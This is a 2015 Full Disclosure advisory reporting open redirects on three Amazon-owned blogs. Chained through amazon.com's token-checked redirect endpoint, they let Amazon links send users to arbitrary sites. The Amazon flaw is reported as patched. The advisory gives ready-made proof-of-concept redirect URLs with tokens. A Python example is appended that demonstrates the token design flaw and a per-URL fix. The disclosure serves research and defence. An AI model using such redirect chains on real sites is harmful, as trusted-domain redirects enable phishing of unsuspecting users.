Message-ID: <CAFWG0-grgXU-+OA3HOCNd3WJpdgbcfu_tJ6nFYuf-PF7dZpY9Q@mail.gmail.com>
Date: Sun, 11 Jan 2015 14:42:57 +0800
From: Jing Wang <justqdjing@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust & kindlepost.com omnivoracious.com carlustblog.com Open Redirect

*Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust & kindlepost.com omnivoracious.com carlustblog.com Open Redirect*

*Discovered by:* Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/

*Domains:*
http://www.amazon.com

kindlepost.com, omnivoracious.com and carlustblog.com are all websites belonging to Amazon.

http://www.kindlepost.com
"The Kindle Post keeps Kindle customers up-to-date on the latest Kindle news and information and passes along fun reading recommendations, author interviews, and more."

http://www.omnivoracious.com
"Omnivoracious is a blog run by the books editors at Amazon.com. We aim to share our passion for the written word through news, reviews, interviews, and more. This is our space to talk books and publishing frankly and we welcome participation through comments. Please visit often or add us to your favorite RSS reader to keep up on the latest information."

http://www.carlustblog.com
"Car Lust is, very simply, where interesting cars meet irrational emotion. It's a deeply personal exploration of the hidden gems of the automotive world; a twisted look into a car nut's mind; and a quirky look at the broader automotive universe - a broader universe that lies beneath the new, the flashy, and the trendy represented in the car magazines."

*Vulnerabilities Description:*
Amazon has a security problem. Both Amazon itself and its websites are vulnerable to different kinds of attacks.

When a user is redirected from Amazon to another site, Amazon checks a variable named "token". Every website that Amazon redirects to is given one token. This idea is fine in principle. However, all URLs on the redirected-to website share the same token. This means that if the trusted site itself has an open redirect vulnerability, victims can be redirected from Amazon to any site.

The vulnerabilities can be exploited without the user being logged in.

Tests were performed on Safari 6.1.6 on Mac OS X 10.7.5, IE 8 on Windows 7, and Chromium (version 37.0.2062.120) on Ubuntu 12.04 (281580) (64-bit).

The following tests use the website http://www.diebiyi.com/articles. Suppose this website is malicious.

*(1) Kindle Daily Post Open Redirect & Amazon Covert Redirect Based on kindlepost.com*

*(1.1) Kindle Daily Post Open Redirect Security Vulnerability*

*Vulnerable Links:*
http://www.kindlepost.com/.services/sitelogout?to=https%3A%2F%2Fwww.typekey.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com%252F2013%252F03%252Fqa-with-rainbow-rowell-author-of-eleanor-park.html

*PoC:*
http://www.kindlepost.com/.services/sitelogout?to=http%3A%2F%2Fwww.diebiyi.com%3F%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com

*(1.2) Amazon Covert Redirect Based on kindlepost.com*

*Vulnerable URL of Amazon:*
http://www.amazon.com/gp/redirect.html?location=http://www.kindlepost.com/2014/02/index.html&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D

*PoC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.kindlepost.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.diebiyi.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.kindlepost.com&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D

*(2) Omnivoracious Open Redirect & Amazon Covert Redirect Based on omnivoracious.com*

*(2.1) Omnivoracious Open Redirect Security Vulnerability*

*Vulnerable Links:*
http://www.omnivoracious.com/.services/sitelogout?to=https%3A%2F%2Fwww.bing.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com%252F2008%252F05%252Flicensed-to-thr.html

*PoC:*
http://www.omnivoracious.com/.services/sitelogout?to=http%3A%2F%2Fwww.tetraph.com%3F%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com

*(2.2) Amazon Covert Redirect Based on omnivoracious.com*

*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?location=http://www.omnivoracious.com/2014/01/women-in-wartime-four-new-historical-novels.html&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087

*PoC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.omnivoracious.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.xinhuanet.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087

*(3) Car Lust Open Redirect & Amazon Covert Redirect Based on carlustblog.com*

*(3.1) Car Lust Open Redirect Security Vulnerability*

*Vulnerable Links:*
http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.xvideos.com%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com

*PoC:*
http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.kickass.so%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com

*(3.2) Amazon Covert Redirect Based on carlustblog.com*

*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?location=http://www.carlustblog.com/2014/01/gmc-canyon-isuzu-i-series-and-chevrolet-colorado-gmt355-platform.html&token=E0915379AEBDF40D2C90D4882003C7011F43D80

*PoC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.varlustblog.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.inzeed.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=E0915379AEBDF40D2C90D4882003C7011F43D80

The vulnerabilities were reported to Amazon in 2014. Amazon has patched the vulnerabilities.

*PoC Video:*
https://www.youtube.com/watch?v=UE_-AdA-zpQ&feature=youtu.be

*Blog Details:*
http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-based-on-kindle.html

--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
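To make the token design flaw the post describes concrete, here is an added Python example (not Amazon's code and not from the post's author) that contrasts a redirect token bound only to the destination host with one bound to the full canonical URL: the host-bound check accepts the decoded `location` from the (1.2) PoC above, because it lives on kindlepost.com, while the URL-bound check rejects it. The HMAC key and both token derivations are constructed for the demonstration; the post does not reveal how Amazon actually derives its tokens.

```python
import hashlib
import hmac
from urllib.parse import urlsplit, urlunsplit

# Constructed demo key; Amazon's real token derivation is unknown (assumption).
SECRET = b"constructed-demo-key"


def canonical(location: str) -> str:
    """Normalise scheme/host case, default the path, drop the fragment."""
    p = urlsplit(location)
    return urlunsplit((p.scheme.lower(), p.netloc.lower(), p.path or "/", p.query, ""))


def domain_token(location: str) -> str:
    """Weak scheme from the post: one token per destination host, so every
    URL on that host (including its own redirector endpoint) validates."""
    host = urlsplit(location).netloc.lower()
    return hmac.new(SECRET, host.encode(), hashlib.sha1).hexdigest().upper()


def url_token(location: str) -> str:
    """Hardened scheme: token bound to the full canonical URL, so only the
    exact destination that was signed validates."""
    return hmac.new(SECRET, canonical(location).encode(), hashlib.sha1).hexdigest().upper()


def redirect_allowed(location: str, token: str, per_url: bool) -> bool:
    expected = url_token(location) if per_url else domain_token(location)
    return hmac.compare_digest(expected, token)


# Legitimate destination taken from the post's "Vulnerable URL of Amazon" (1.2).
LEGIT = "http://www.kindlepost.com/2014/02/index.html"
# Once-decoded 'location' value of the post's (1.2) PoC: same host, but the path
# is kindlepost.com's own open-redirect endpoint pointing off-site.
CRAFTED = ("http://www.kindlepost.com/.services/sitelogout?to=http%3A%2F%2F"
           "www.diebiyi.com%3F%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com")


def demo() -> dict:
    per_domain = domain_token(LEGIT)   # what a host-scoped issuer hands out
    per_url = url_token(LEGIT)         # token tied to the one signed page
    return {
        "domain_scheme_accepts_crafted": redirect_allowed(CRAFTED, per_domain, False),  # True: the flaw
        "url_scheme_accepts_crafted": redirect_allowed(CRAFTED, per_url, True),         # False
        "url_scheme_accepts_legit": redirect_allowed(LEGIT, per_url, True),             # True
    }


if __name__ == "__main__":
    print(demo())
```

Binding the token to the full URL limits redirects to pages the issuer actually signed; the issuer must in turn never sign a partner site's own redirector endpoint, or the chain simply moves one hop down.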